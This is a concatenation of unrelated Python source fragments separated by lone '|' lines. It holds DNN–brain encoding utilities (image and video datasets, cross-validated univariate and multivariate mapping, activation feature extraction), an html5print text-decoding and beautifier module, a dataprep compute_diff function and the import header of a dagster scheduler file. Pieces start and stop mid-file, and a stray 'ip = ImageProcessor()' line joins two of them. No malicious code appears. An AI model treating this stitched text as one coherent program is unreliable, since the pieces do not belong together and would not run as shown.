self.labels = np.ones(len(self.img_ids)) if labels is None else labels
self.labels = np.int64(self.labels)
self.transform = transforms.Compose([transforms.ToTensor()]) if transform is None else transform
def __len__(self):
"""
Return the number of images
"""
return len(self.img_ids)
def __getitem__(self, indices):
"""
Get image data and corresponding labels
Parameters
----------
indices[int|list|slice]: subscript indices
Returns
-------
data : tensor image data with shape as (n_stim, n_chn, height, weight)
labels : list image labels
"""
# check availability and do preparation
if isinstance(indices, int):
tmp_ids = [self.img_ids[indices]]
labels = [self.labels[indices]]
elif isinstance(indices, list):
tmp_ids = [self.img_ids[idx] for idx in indices]
labels = [self.labels[idx] for idx in indices]
elif isinstance(indices, slice):
tmp_ids = self.img_ids[indices]
labels = self.labels[indices]
else:
raise IndexError("only integer, slices (`:`) and list are valid indices")
# load data
data = torch.zeros(0)
for img_id in tmp_ids:
image = Image.open(pjoin(self.img_dir, img_id)).convert('RGB') # load image
image = self.transform(image) # transform image
image = torch.unsqueeze(image, 0)
data = torch.cat((data, image))
if data.shape[0] == 1:
data = data[0]
labels = labels[0] # len(labels) == 1
return data, labels
class VideoSet:
"""
Dataset for video data
"""
def __init__(self, vid_file, frame_nums, labels=None, transform=None):
"""
Parameters
----------
vid_file : str
Video data file.
frame_nums : list
Sequence numbers of the frames of interest.
labels : list
Each frame's label.
transform : pytorch transform
"""
self.vid_cap = cv2.VideoCapture(vid_file)
self.frame_nums = frame_nums
self.labels = np.ones(len(self.frame_nums)) if labels is None else labels
self.labels = np.int64(self.labels)
self.transform = transforms.Compose([transforms.ToTensor()]) if transform is None else transform
def __getitem__(self, indices):
"""
Get frame data and corresponding labels
Parameters
----------
indices : int, list, slice
Subscript indices
Returns
-------
data : tensor
Frame data with shape as (n_stim, n_chn, height, weight).
labels : list
Frame labels.
"""
# check availability and do preparation
if isinstance(indices, int):
tmp_nums = [self.frame_nums[indices]]
labels = [self.labels[indices]]
elif isinstance(indices, list):
tmp_nums = [self.frame_nums[idx] for idx in indices]
labels = [self.labels[idx] for idx in indices]
elif isinstance(indices, slice):
tmp_nums = self.frame_nums[indices]
labels = self.labels[indices]
else:
raise IndexError("only integer, slices (`:`) and list are valid indices")
# load data
data = torch.zeros(0)
for frame_num in tmp_nums:
# get frame
self.vid_cap.set(cv2.CAP_PROP_POS_FRAMES, frame_num-1)
_, frame = self.vid_cap.read()
frame = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
frame = self.transform(frame) # transform frame
frame = torch.unsqueeze(frame, 0)
data = torch.cat((data, frame))
if data.shape[0] == 1:
data = data[0]
labels = labels[0] # len(labels) == 1
return data, labels
def __len__(self):
"""
Return the number of frames.
"""
return len(self.frame_nums)
def cross_val_confusion(classifier, X, y, cv=None):
"""
Evaluate confusion matrix and score from each fold of cross validation
Parameters
----------
classifier: classifier object
The object used to fit the data.
X : ndarray
Shape=(n_sample, n_feature).
y : ndarray
Shape=(n_sample,).
cv : int
The number of folds of the cross validation.
Returns
-------
conf_ms : list
Confusion matrices of the folds.
accuracies : list
Accuracies of the folds.
"""
assert getattr(classifier, "_estimator_type", None) == "classifier", \
"Estimator must be a classifier!"
# calculate CV metrics
conf_ms = []
accuracies = []
classifier = copy.deepcopy(classifier)
skf = StratifiedKFold(n_splits=cv)
for train_indices, test_indices in skf.split(X, y):
# fit and prediction
classifier.fit(X[train_indices], y[train_indices])
y_preds = classifier.predict(X[test_indices])
# calculate confusion matrix and accuracy
conf_m = confusion_matrix(y[test_indices], y_preds)
acc = np.sum(conf_m.diagonal()) / np.sum(conf_m)
# collection
conf_ms.append(conf_m)
accuracies.append(acc)
return conf_ms, accuracies
def cross_val_scores(regressor, X, Y, scoring, cv=None, multi_trg_flag=True):
"""
Evaluate scores for each run of cross validation
Parameters
----------
regressor: regressor object
The estimator used to fit the data.
X : ndarray
Shape=(n_sample, n_feature).
Y : ndarray
Shape=(n_sample, n_target).
scoring : str | callable
see scoring of Regression at
https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values
If is str, choices=(explained_variance, r2, correlation).
If is callable, the inputs and outputs should imitate scoring metrics in sklearn.
The input parameters should include y_true, y_pred, and multioutput at least.
cv : int
The number of runs of the cross validation.
multi_trg_flag : bool
Whether the regressor is able to fit multi-targets at onces or not.
Returns
-------
scores : ndarray
shape=(cv, n_target)
"""
assert getattr(regressor, "_estimator_type", None) == "regressor", \
"Estimator must be a regressor!"
regressor = copy.deepcopy(regressor)
# get scoring metric
if isinstance(scoring, str):
if scoring == 'r2':
scoring = r2_score
elif scoring == 'explained_variance':
scoring = explained_variance_score
elif scoring == 'correlation':
scoring = correlation_score
else:
raise ValueError("If scoring is str, choices=(explained_variance, r2, correlation).")
elif callable(scoring):
pass
else:
raise ValueError("Not supported scoring")
# calculate CV metrics
n_trg = Y.shape[1]
scores = np.zeros((cv, n_trg))
kf = KFold(n_splits=cv)
for cv_idx, indices in enumerate(kf.split(X, Y)):
time1 = time.time()
# prepare train and test data
train_indices, test_indices = indices
X_train = X[train_indices]
Y_train = Y[train_indices]
X_test = X[test_indices]
Y_test = Y[test_indices]
# calculate Y_pred
if multi_trg_flag:
regressor.fit(X_train, Y_train)
Y_pred = regressor.predict(X_test)
else:
Y_pred = np.zeros_like(Y_test)
for trg_idx in range(n_trg):
regressor.fit(X_train, Y_train[:, trg_idx])
Y_pred[:, trg_idx] = regressor.predict(X_test)
# calculate scores
scores[cv_idx] = scoring(Y_test, Y_pred, multioutput='raw_values')
print('Finish CV-{}/{}, cost {} seconds'.format(cv_idx + 1, cv,
time.time() - time1))
return scores
def gen_estimator_from_name(name):
"""
Generate sklearn estimator from name
Parameters
----------
name : str
name of estimator
Returns
-------
estimator : sklearn estimator
"""
if name == 'lrc':
estimator = LogisticRegression()
elif name == 'svc':
estimator = SVC(kernel='linear', C=0.025)
elif name == 'glm':
estimator = LinearRegression()
elif name == 'lasso':
estimator = Lasso()
else:
raise ValueError("Not supported estimator name: {}".format(name))
return estimator
class UnivariateMapping:
"""
For each target samples, evaluate every feature samples' predictive ability
and record location, prediction score and model of the feature with maximal
predictive ability.
"""
def __init__(self, estimator=None, cv=5, scoring=None):
"""
Parameters
----------
estimator : str | sklearn estimator or pipeline
If is str, it is a name of a estimator used to do mapping. |br|
There are some optional names at below:
+------------+------------+--------------------------------+
| name | type | description |
+============+============+================================+
| lrc | classifier | Logistic Regression Classifier |
+------------+------------+--------------------------------+
| svc | classifier | C-Support Vector Classification|
+------------+------------+--------------------------------+
| glm | regressor | Ordinary least squares Linear |
| | | Regression |
+------------+------------+--------------------------------+
| lasso | regressor | Linear Model trained with L1 |
| | | prior as regularizer |
+------------+------------+--------------------------------+
*Note*: If name is 'corr', it just uses correlation rather than prediction.
cv : int
The number of cross validation folds.
scoring : str or callable
The method to evaluate the predictions on the test set.
"""
self.set_estimator(estimator)
self.set_cv(cv)
self.set_scoring(scoring)
def set_estimator(self, estimator):
"""
Parameters
----------
estimator : str | sklearn estimator or pipeline
If is str, it is a name of a estimator used to do mapping. |br|
There are some optional names at below:
+------------+------------+--------------------------------+
| name | type | description |
+============+============+================================+
| lrc | classifier | Logistic Regression Classifier |
+------------+------------+--------------------------------+
| svc | classifier | C-Support Vector Classification|
+------------+------------+--------------------------------+
| glm | regressor | Ordinary least squares Linear |
| | | Regression |
+------------+------------+--------------------------------+
| lasso | regressor | Linear Model trained with L1 |
| | | prior as regularizer |
+------------+------------+--------------------------------+
*Note*: If name is 'corr', it just uses correlation rather than prediction.
"""
if estimator is None:
return
elif isinstance(estimator, str):
if estimator == 'corr':
self.estimator = None
self.estimator_type = 'correlation'
else:
self.estimator = gen_estimator_from_name(estimator)
self.estimator_type = getattr(self.estimator, "_estimator_type")
else:
self.estimator = estimator
self.estimator_type = getattr(self.estimator, "_estimator_type")
if self.estimator_type not in ('classifier', 'regressor', 'correlation'):
raise ValueError("Not supported estimator type: {}".format(self.estimator_type))
def set_cv(self, cv):
"""
Parameters
----------
cv : int
The number of cross validation folds.
"""
self.cv = cv
def set_scoring(self, scoring):
"""
Parameters
----------
scoring : str or callable
The method to evaluate the predictions on the test set.
It depends on estimator type.
+----------------+----------------------------------------------+
| estimator type | Scoring description |
+================+==============================================+
| classifier | The evaluation method is fixed as accuracy |
| | and confusion matrix. |
+----------------+----------------------------------------------+
| regressor | Scoring parameters or strategies supported |
| | by **sklearn** in addition to 'correlation'. |
+----------------+----------------------------------------------+
| correlation | No evaluation method is needed. |
+----------------+----------------------------------------------+
"""
if scoring is None:
self.scoring = scoring
elif hasattr(self, 'estimator_type'):
if self.estimator_type == 'classifier':
print("The evaluation method of a classifier "
"is fixed as accuracy and confusion matrix.")
self.scoring = None
elif self.estimator_type == 'regressor':
if scoring == 'correlation':
self.scoring = correlation_scorer
else:
self.scoring = scoring
else:
print("correlation analysis doesn't need evaluation method.")
self.scoring = None
else:
raise ValueError("You have to set estimator first!")
def map(self, X, Y):
"""
Use all columns of **X** (one-by-one) to predict each column of **Y**;
For each column of Y:
Find the location of the column of X which has the maximal prediction score;
Record the location, and corresponding score and model.
Parameters
----------
X : ndarray
shape=(n_sample, n_feature)
Y : ndarray
shape=(n_sample, n_target)
Returns
-------
map_dict: dict
It depends on estimator type.
+------------+-----------+--------------------------------------------------------------+
| estimator | key | value |
| type | | |
+============+===========+==============================================================+
| classifier | score | An array with shape as (n_target, cv). |br| |
| | | Each row contains accuracies of each cross |br| |
| | | validation folds, when using the feature at the |br| |
| | | maximal location to predict the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | location | An array with shape as (n_target,). |br| |
| | | Each element is a location of the feature |br| |
| | | which makes the maximal score. |
| +-----------+--------------------------------------------------------------+
| | model | An array with shape as (n_target,). |br| |
| | | Each element is a model fitted by the feature |br| |
| | | at the maximal location and the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | conf_m | An array with shape as (n_target, cv). |br| |
| | | Each row contains confusion matrices |br| |
| | | (n_label, n_label) of each cross validation folds, |br| |
| | | when using the feature at the maximal location to |br| |
| | | predict the corresponding target. |
+------------+-----------+--------------------------------------------------------------+
| regressor | score | An array with shape as (n_target, cv). |br| |
| | | Each row contains scores of each cross |br| |
| | | validation folds, when using the feature at |br| |
| | | the maximal location to predict the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | location | An array with shape as (n_target,). |br| |
| | | Each element is a location of the feature |br| |
| | | which makes the maximal score. |
| +-----------+--------------------------------------------------------------+
| | model | An array with shape as (n_target,). |br| |
| | | Each element is a model fitted by the feature |br| |
| | | at the maximal location and the corresponding target. |
+------------+-----------+--------------------------------------------------------------+
| correlation| score | An array with shape as (n_target,). |br| |
| | | Each element is the maximal pearson r among all |br| |
| | | features correlating to the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | location | An array with shape as (n_target,). |br| |
| | | Each element is a location of the feature |br| |
| | | which makes the maximal score. |
+------------+-----------+--------------------------------------------------------------+
.. |br| raw:: html
<br/>
"""
assert X.ndim == 2, "X's shape must be (n_sample, n_feature)!"
assert Y.ndim == 2, "Y's shape must be (n_sample, n_target)!"
assert X.shape[0] == Y.shape[0], 'X and Y must have the ' \
'same number of samples!'
n_feat = X.shape[1]
n_trg = Y.shape[1]
# initialize mapping dict
map_dict = {'location': np.zeros((n_trg,), dtype=np.int)}
if self.estimator_type == 'classifier':
map_dict['model'] = np.zeros((n_trg,), dtype=np.object)
map_dict['score'] = np.zeros((n_trg, self.cv))
map_dict['conf_m'] = np.zeros((n_trg, self.cv), dtype=np.object)
elif self.estimator_type == 'regressor':
map_dict['model'] = np.zeros((n_trg,), dtype=np.object)
map_dict['score'] = np.zeros((n_trg, self.cv))
else:
map_dict['score'] = np.zeros((n_trg,))
# do cross validation for each target
for trg_idx in range(n_trg):
time1 = time.time()
y = Y[:, trg_idx]
if self.estimator_type == 'correlation':
# calculate pearson r
scores_tmp = pairwise_distances(X.T, y.reshape(1, -1), 'correlation')
scores_tmp = 1 - scores_tmp.ravel()
# find maximal score and its location
max_feat_idx = np.nanargmax(scores_tmp)
map_dict['location'][trg_idx] = max_feat_idx
map_dict['score'][trg_idx] = scores_tmp[max_feat_idx]
elif self.estimator_type == 'regressor':
# cross validation
scores_cv = np.zeros((n_feat, self.cv))
for feat_idx in range(n_feat):
scores_cv[feat_idx] = cross_val_score(self.estimator, X[:, [feat_idx]], y,
scoring=self.scoring, cv=self.cv)
scores_tmp = np.mean(scores_cv, 1)
# find maximal score and its location
max_feat_idx = np.nanargmax(scores_tmp)
map_dict['location'][trg_idx] = max_feat_idx
map_dict['score'][trg_idx] = scores_cv[max_feat_idx]
map_dict['model'][trg_idx] = deepcopy(self.estimator.fit(X[:, [max_feat_idx]], y))
else:
# cross validation
scores_cv = np.zeros((n_feat, self.cv))
conf_ms_cv = np.zeros((n_feat, self.cv), dtype=np.object)
for feat_idx in range(n_feat):
conf_ms, accs = cross_val_confusion(self.estimator, X[:, [feat_idx]], y, cv=self.cv)
scores_cv[feat_idx] = accs
conf_ms_cv[feat_idx] = conf_ms
scores_tmp = np.mean(scores_cv, 1)
# find maximal score and its location
max_feat_idx = np.nanargmax(scores_tmp)
map_dict['location'][trg_idx] = max_feat_idx
map_dict['score'][trg_idx] = scores_cv[max_feat_idx]
map_dict['conf_m'][trg_idx] = conf_ms_cv[max_feat_idx]
map_dict['model'][trg_idx] = deepcopy(self.estimator.fit(X[:, [max_feat_idx]], y))
print('Finish target {}/{} in {} seconds.'.format(trg_idx+1, n_trg, time.time()-time1))
return map_dict
class MultivariateMapping:
def __init__(self, estimator=None, cv=5, scoring=None):
"""
Parameters
----------
estimator : str | sklearn estimator or pipeline
If is str, it is a name of a estimator used to do mapping. |br|
There are some optional names at below:
+------------+------------+--------------------------------+
| name | type | description |
+============+============+================================+
| lrc | classifier | Logistic Regression Classifier |
+------------+------------+--------------------------------+
| svc | classifier | C-Support Vector Classification|
+------------+------------+--------------------------------+
| glm | regressor | Ordinary least squares Linear |
| | | Regression |
+------------+------------+--------------------------------+
| lasso | regressor | Linear Model trained with L1 |
| | | prior as regularizer |
+------------+------------+--------------------------------+
cv : int
The number of cross validation folds.
scoring : str or callable
The method to evaluate the predictions on the test set.
"""
self.set_estimator(estimator)
self.set_cv(cv)
self.set_scoring(scoring)
def set_estimator(self, estimator):
"""
Parameters
----------
estimator : str | sklearn estimator or pipeline
If is str, it is a name of a estimator used to do mapping. |br|
There are some optional names at below:
+------------+------------+--------------------------------+
| name | type | description |
+============+============+================================+
| lrc | classifier | Logistic Regression Classifier |
+------------+------------+--------------------------------+
| svc | classifier | C-Support Vector Classification|
+------------+------------+--------------------------------+
| glm | regressor | Ordinary least squares Linear |
| | | Regression |
+------------+------------+--------------------------------+
| lasso | regressor | Linear Model trained with L1 |
| | | prior as regularizer |
+------------+------------+--------------------------------+
"""
if estimator is None:
return
elif isinstance(estimator, str):
self.estimator = gen_estimator_from_name(estimator)
self.estimator_type = getattr(self.estimator, "_estimator_type")
else:
self.estimator = estimator
self.estimator_type = getattr(self.estimator, "_estimator_type")
if self.estimator_type not in ('classifier', 'regressor'):
raise ValueError("Not supported estimator type: {}".format(self.estimator_type))
def set_cv(self, cv):
"""
Parameters
----------
cv : int
The number of cross validation folds.
"""
self.cv = cv
def set_scoring(self, scoring):
"""
Parameters
----------
scoring : str or callable
The method to evaluate the predictions on the test set.
It depends on estimator type.
+----------------+----------------------------------------------+
| estimator type | Scoring description |
+================+==============================================+
| classifier | The evaluation method is fixed as accuracy |
| | and confusion matrix. |
+----------------+----------------------------------------------+
| regressor | Scoring parameters or strategies supported |
| | by **sklearn** in addition to 'correlation'. |
+----------------+----------------------------------------------+
"""
if scoring is None:
self.scoring = None
elif hasattr(self, 'estimator_type'):
if self.estimator_type == 'classifier':
print("The evaluation method of a classifier "
"is fixed as accuracy and confusion matrix.")
self.scoring = None
else:
self.scoring = scoring
else:
raise ValueError("You have to set estimator first!")
def map(self, X, Y):
"""
Use all columns of X to predict each column of Y.
Parameters
----------
X : ndarray
shape=(n_sample, n_feature)
Y : ndarray
shape=(n_sample, n_target)
Returns
-------
map_dict: dict
It depends on estimator type.
+------------+-----------+--------------------------------------------------------------+
| estimator | key | value |
| type | | |
+============+===========+==============================================================+
| classifier | score | An array with shape as (n_target, cv). |br| |
| | | Each row contains accuracies of each cross |br| |
| | | validation folds, when using all features to |br| |
| | | predict the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | model | An array with shape as (n_target,). |br| |
| | | Each element is a model fitted by all features |br| |
| | | and the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | conf_m | An array with shape as (n_target, cv). |br| |
| | | Each row contains confusion matrices |br| |
| | | (n_label, n_label) of each cross validation |br| |
| | | folds, when using all features to predict the |br| |
| | | corresponding target. |
+------------+-----------+--------------------------------------------------------------+
| regressor | score | An array with shape as (n_target, cv). |br| |
| | | Each row contains scores of each cross |br| |
| | | validation folds, when using all features to |br| |
| | | predict the corresponding target. |
| +-----------+--------------------------------------------------------------+
| | model | An array with shape as (n_target,). |br| |
| | | Each element is a model fitted by all features |br| |
| | | and the corresponding target. |
+------------+-----------+--------------------------------------------------------------+
.. |br| raw:: html
<br/>
"""
assert X.ndim == 2, "X's shape must be (n_sample, n_feature)!"
assert Y.ndim == 2, "Y's shape must be (n_sample, n_target)!"
assert X.shape[0] == Y.shape[0], 'X and Y must have the ' \
'same number of samples!'
n_trg = Y.shape[1]
# initialize prediction dict
map_dict = {'model': np.ones((n_trg,), dtype=np.object) * 'm'}
print('Start mapping:')
time1 = time.time()
if self.estimator_type == 'classifier':
map_dict['score'] = np.zeros((n_trg, self.cv))
map_dict['conf_m'] = np.zeros((n_trg, self.cv), dtype=np.object)
for trg_idx in range(n_trg):
time2 = time.time()
y = Y[:, trg_idx]
conf_ms, scores_tmp = cross_val_confusion(self.estimator, X, y, self.cv)
map_dict['conf_m'][trg_idx] = conf_ms
map_dict['score'][trg_idx] = scores_tmp
map_dict['model'][trg_idx] = deepcopy(self.estimator.fit(X, y))
print('Finish target {}/{} in {} seconds.'.format(
trg_idx + 1, n_trg, time.time() - time2))
else:
# multi-target flag
multi_trg_flag = True
try:
Y_tmp = np.c_[Y[:, [0]], Y[:, [0]]] # for fear that n_target is 1
self.estimator.fit(X, Y_tmp)
del Y_tmp
except ValueError:
multi_trg_flag = False
print('multi-target flag is', multi_trg_flag)
scores_tmp = cross_val_scores(self.estimator, X, Y,
self.scoring, self.cv, multi_trg_flag)
# recording
map_dict['score'] = scores_tmp.T
if multi_trg_flag:
map_dict['model'][0] = deepcopy(self.estimator.fit(X, Y))
else:
for trg_idx in range(n_trg):
map_dict['model'][trg_idx] = deepcopy(self.estimator.fit(X, Y[:, trg_idx]))
print('Finish mapping in {} seconds.'.format(time.time() - time1))
return map_dict
def dnn_mask(dnn_acts, channels='all', rows='all', columns='all'):
"""
Extract DNN activation
Parameters
----------
dnn_acts : ndarray
DNN activation
A 4D array with its shape as (n_stim, n_chn, n_row, n_col).
channels: str, list
Channels of interest.
If is str, it must be 'all' which means all channels.
If is list, its elements are serial numbers of channels.
rows: str, list
rows of interest.
If is str, it must be 'all' which means all rows.
If is list, its elements are serial numbers of rows.
columns: str, list
Columns of interest.
If is str, it must be 'all' which means all columns.
If is list, its elements are serial numbers of columns.
Return
------
dnn_acts : ndarray
DNN activation after mask.
A 4D array with its shape as (n_stim, n_chn, n_row, n_col).
"""
if isinstance(channels, list):
channels = [chn-1 for chn in channels]
dnn_acts = dnn_acts[:, channels, :, :]
if isinstance(rows, list):
rows = [row-1 for row in rows]
dnn_acts = dnn_acts[:, :, rows, :]
if isinstance(columns, list):
columns = [col-1 for col in columns]
dnn_acts = dnn_acts[:, :, :, columns]
return dnn_acts
def dnn_fe(dnn_acts, method, n_feat, axis=None):
"""
Extract features of DNN activation
Parameters
----------
dnn_acts : ndarray
DNN activation.
A 4D array with its shape as (n_stim, n_chn, n_row, n_col).
method : str
Feature extraction method, choices: ('pca', 'hist', 'psd')
+------------+-------------------------------------------+
| method name| description |
+============+===========================================+
| pca |use n_feat principal components as features|
+------------+-------------------------------------------+
| hist |use histogram of activation as features |
+------------+-------------------------------------------+
| psd |use power spectral density as features |
+------------+-------------------------------------------+
*Note*: In 'hist', n_feat equal-width bins in the given range will be used!
n_feat : int, float
The number of features to extract.
*Note*: It can be a float only when the method is pca.
axis : str
axis for feature extraction, choices=(chn, row_col)
+----------+----------------------------------+
| axis | array shape |
+==========+==================================+
| chn | (n_stim, n_feat, n_row, n_col) |
+----------+----------------------------------+
| row_col | (n_stim, n_chn, n_feat, 1) |
+----------+----------------------------------+
| None | (n_stim, n_feat, 1, 1) |
+----------+----------------------------------+
*Note*: We always regard the shape of the result as (n_stim, n_chn, n_row, n_col)
Return
------
dnn_acts_new : ndarray
DNN activation.
A 4D array with its shape as (n_stim, n_chn, n_row, n_col).
"""
# adjust iterative axis
n_stim, n_chn, n_row, n_col = dnn_acts.shape
dnn_acts = dnn_acts.reshape((n_stim, n_chn, n_row*n_col))
if axis is None:
dnn_acts = dnn_acts.reshape((n_stim, 1, -1))
elif axis == 'chn':
dnn_acts = dnn_acts.transpose((0, 2, 1))
elif axis == 'row_col':
pass
else:
raise ValueError('not supported axis:', axis)
_, n_iter, _ = dnn_acts.shape
# extract features
if method == 'pca':
dnn_acts_new = []
pca = PCA(n_components=n_feat)
for i in range(n_iter):
dnn_acts_new.append(pca.fit_transform(dnn_acts[:, i, :]))
dnn_acts_new = np.asarray(dnn_acts_new).transpose((1, 0, 2))
elif method == 'hist':
dnn_acts_new = np.zeros((n_stim, n_iter, n_feat))
for i in range(n_iter):
for j in range(n_stim):
dnn_acts_new[j, i, :] = np.histogram(dnn_acts[j, i, :], n_feat)[0]
elif method == 'psd':
dnn_acts_new = np.zeros((n_stim, n_iter, n_feat))
for i in range(n_iter):
for j in range(n_stim):
f, p = periodogram(dnn_acts[j, i, :])
dnn_acts_new[j, i, :] = p[:n_feat]
else:
raise ValueError('not supported method:', method)
# adjust iterative axis
if axis is None:
dnn_acts_new = dnn_acts_new.transpose((0, 2, 1))
dnn_acts_new = dnn_acts_new[:, :, :, None]
elif axis == 'chn':
dnn_acts_new = dnn_acts_new.transpose((0, 2, 1))
dnn_acts_new = dnn_acts_new.reshape((n_stim, n_feat, n_row, n_col))
else:
dnn_acts_new = dnn_acts_new[:, :, :, None]
return dnn_acts_new
ip = ImageProcessor()
|
# -*- coding: utf-8 -*-
#
# Copyright 2014 Bernard Yue
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import unicode_literals, absolute_import
import os
import sys
import re
import types
import warnings
try:
import chardet as cdetector
except ImportError:
try:
import cchardet as cdetector
except ImportError:
print('Requires either chardet or cchardet module')
raise
def decodeText(text, encoding=None):
"""Decoding `text` to `encoding`. If `encoding` is None, encoding
will be guessed.
**Note**: `encoding` provided will be disregarded if it causes decoding
error
:param text: string to be decoded
:param encoding: encoding scheme of `text`. guess by system if None
:returns: new decoded text as unicode
>>> import sys
>>> from html5print import decodeText
>>> s = 'Hello! 您好! こんにちは! halló!'
>>> output = decodeText(s)
>>> print(output)
Hello! 您好! こんにちは! halló!
>>> if sys.version_info[0] >= 3:
... unicode = str
>>> isinstance(output, unicode)
True
"""
# if `text` is unicode, not much to convert
if isUnicode(text):
return text
# Now for non unicode text, try decode with provided encoding
if encoding:
try:
text = text.decode(encoding, 'strict')
except (UnicodeEncodeError, UnicodeDecodeError) as e:
# incorrect `encoding` set by caller, so let's guess first
warnings.warn(str(e))
else:
return text
# no encoding or decoding with provided `encoding` failed
detected = cdetector.detect(text)
detectedEncoding = detected['encoding']
encodingToUse = detectedEncoding
if not detectedEncoding:
# when all things failed, go 'utf-8' for now
# TODO: find another way
encodingToUse = 'utf-8'
try:
text = text.decode(encodingToUse, 'ignore')
except UnicodeEncodeError as e:
msg = str(e) + ' Encodeing used: {}'.format(encodingToUse)
warnings.warn(msg)
return text
def isUnicode(text):
"""Return True if `text` is unicode. False otherwise. Note that because
the function has to work on both Python 2 and Python 3, u'' cannot be used
in doctest.
:param text: string to check if it is unicode
:returns: | **True** if `text` is unicode,
| **False** otherwise
>>> import sys
>>> if sys.version_info[0] >= 3:
... isUnicode(bytes('hello', 'ascii'))
... else:
... isUnicode(bytes('hello'))
False
>>> import sys
>>> if sys.version_info[0] >= 3:
... unicode = str
>>> isUnicode(unicode('hello'))
True
"""
if sys.version_info[0] >= 3:
if isinstance(text, str):
return True
else:
return False
else:
if isinstance(text, str):
return False
else:
return True
class BeautifierBase(object):
"""Base Class for Beautifiers"""
reIndentAndScript = re.compile(r'^(\s*)<script.*?>(.*?)\s*</script',
re.MULTILINE | re.DOTALL | re.IGNORECASE)
reIndentAndStyle = re.compile(r'^(\s*)<style.*?>(.*?)\s*</style',
re.MULTILINE | re.DOTALL | re.IGNORECASE)
@staticmethod
def _stripHTMLComments(text):
"""Removing HTML Comments '<!-- ... -->' out of `text`
:returns: a tuple with the following fields
- text with comment(s) removed
- removed comment(s)
"""
textWithoutComments = ''
comments = []
sep = ('<!--', '-->')
fragments = text.split(sep[0])
if len(fragments) == 1:
textWithoutComments = fragments[0]
else:
textWithoutComments += fragments[0]
for f in fragments[1:]:
tmp = f.split(sep[-1])
if len(tmp) == 1:
# found comment with no endtag ...
# ignore for now
textWithoutComments += tmp[0]
elif len(tmp) == 2:
# this is the correct case
textWithoutComments += tmp[-1]
comments.append(sep[0] + tmp[0].rstrip() + sep[-1])
else:
# this should never happen (maybe invalid
# nested comment)
# for this we take maximum chunk as comment
textWithoutComments += tmp[-1]
comments.append(sep[0] + ''.join(tmp[:-1]) + sep[-1])
return (textWithoutComments, os.linesep.join(comments))
@classmethod
def _findAndReplace(cls, text, regExp, bfunc, bfuncArgs, indent=2):
"""Find and replace `text` with what returned by `regExp` by
beautifing function `bfunc` and params `bfuncArgs`.
:param text: text to be find and replace
:param regExp: regular expression that returns a list of pairs of
(indent, textRequiresFormatting). E.g.
(' ', '* { margin : 0; }')
:param bfunc: beautifying function that take the following
parameters (ordered):
- textRequiresFormatting
- other optional arguments
:param bfuncArgs: list of arguments for `bfunc`
:param indent: width of indentation for section of text requires
beautifing
:returns: beautified text
"""
final = text
sections = []
marker = '%%__mark__%%'
matches = regExp.finditer(text)
if matches:
adjustment = 0
for mo in matches:
spaces, script = mo.groups()
if not script.strip():
continue
start, end = mo.span()
start += adjustment
thisIndent = ' ' * (len(spaces) + indent)
newScript, comments = cls._stripHTMLComments(script)
params = (newScript,) + bfuncArgs
lines = [thisIndent + l for l in bfunc(*params).splitlines()]
lines.extend([thisIndent + l for l in comments.splitlines()])
sections.append(os.linesep.join(lines))
final = final[:start] + final[start:].replace(
script, marker, 1)
adjustment += len(marker) - len(script)
for s in sections:
final = final.replace(marker, os.linesep + s, 1)
return final
|
"""Computations for plot_diff([df...])."""
from typing import Optional, Union, List, Dict, Any
import dask.dataframe as dd
import pandas as pd
from ....errors import DataprepError
from ...intermediate import Intermediate
from ...utils import to_dask
from ...dtypes import DTypeDef
from ...configs import Config
from .multiple_df import compare_multiple_df # type: ignore
__all__ = ["compute_diff"]
def compute_diff(
df: Union[List[Union[pd.DataFrame, dd.DataFrame]], Union[pd.DataFrame, dd.DataFrame]],
x: Optional[str] = None,
*,
cfg: Union[Config, Dict[str, Any], None] = None,
display: Optional[List[str]] = None,
dtype: Optional[DTypeDef] = None,
) -> Intermediate:
"""
All in one compute function.
Parameters
----------
df
DataFrame from which visualizations are generated
cfg: Union[Config, Dict[str, Any], None], default None
When a user call plot(), the created Config object will be passed to compute().
When a user call compute() directly, if he/she wants to customize the output,
cfg is a dictionary for configuring. If not, cfg is None and
default values will be used for parameters.
display: Optional[List[str]], default None
A list containing the names of the visualizations to display. Only exist when
a user call compute() directly and want to customize the output
x: Optional[str], default None
A valid column name from the dataframe
dtype: str or DType or dict of str or dict of DType, default None
Specify Data Types for designated column or all columns.
E.g. dtype = {"a": Continuous, "b": "Nominal"} or
dtype = {"a": Continuous(), "b": "nominal"}
or dtype = Continuous() or dtype = "Continuous" or dtype = Continuous()
"""
if isinstance(cfg, dict):
cfg = Config.from_dict(display, cfg)
elif not cfg:
cfg = Config()
if isinstance(df, list):
if len(df) < 2:
raise DataprepError("plot_diff needs at least 2 DataFrames.")
if len(df) > 5:
raise DataprepError("Too many DataFrames, max: 5.")
label = cfg.diff.label
if not label:
cfg.diff.label = [f"df{i+1}" for i in range(len(df))]
elif len(df) != len(label):
raise ValueError("Number of the given label doesn't match the number of DataFrames.")
if cfg.diff.baseline > len(df) - 1:
raise ValueError("Baseline is out of the boundary of the input.")
df_list = list(map(to_dask, df))
for i, _ in enumerate(df_list):
df_list[i].columns = df_list[i].columns.astype(str)
if x:
# return compare_multiple_on_column(df_list, x)
return Intermediate()
else:
return compare_multiple_df(df_list, cfg, dtype) # type: ignore
else:
raise TypeError(f"Invalid input type: {type(df)}")
|
import datetime
import os
import sys
import time
import pendulum
from dagster import check
from dagster.core.errors import DagsterUserCodeUnreachableError
from dagster.core.host_representation import PipelineSelector, RepositoryLocation
from dagster.core.instance import DagsterInstance
from dagster.core.scheduler.instigation import (
InstigatorState,
InstigatorStatus,
InstigatorType,
TickData,
TickStatus,
)
from dagster.core.scheduler.scheduler import DEFAULT_MAX_CATCHUP_RUNS, DagsterSchedulerError
from dagster.core.storage.pipeline_run import PipelineRun, PipelineRunStatus, PipelineRunsFilter
